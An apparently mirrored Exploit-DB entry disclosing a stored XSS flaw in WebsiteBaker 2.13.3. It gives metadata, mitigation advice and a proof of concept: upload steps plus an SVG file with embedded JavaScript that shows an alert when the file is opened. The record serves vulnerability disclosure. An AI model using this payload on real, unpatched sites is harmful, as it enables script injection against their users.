WebsiteBaker v2.13.3 - Stored XSS

vendor:

WebsiteBaker

by:

Mirabbas Agalarov

7.5

CVSS

HIGH

Stored XSS

CWE

Product Name: WebsiteBaker

Affected Version From: 2.13.3

Affected Version To: 2.13.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

WebsiteBaker v2.13.3 – Stored XSS

The WebsiteBaker application version 2.13.3 is vulnerable to stored cross-site scripting (XSS) attacks. An attacker can upload a specially crafted SVG file containing malicious JavaScript code, which will be executed when a user accesses the file.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of WebsiteBaker or apply the necessary patches provided by the vendor. Additionally, input validation and output encoding should be implemented to prevent XSS attacks.

Source

Exploit-DB raw data:

Exploit Title: WebsiteBaker v2.13.3 - Stored XSS
Application: WebsiteBaker
Version: 2.13.3
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. login to account
2. go to media
3. upload svg file

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""
4. go to svg file (http://localhost/media/malas.svg)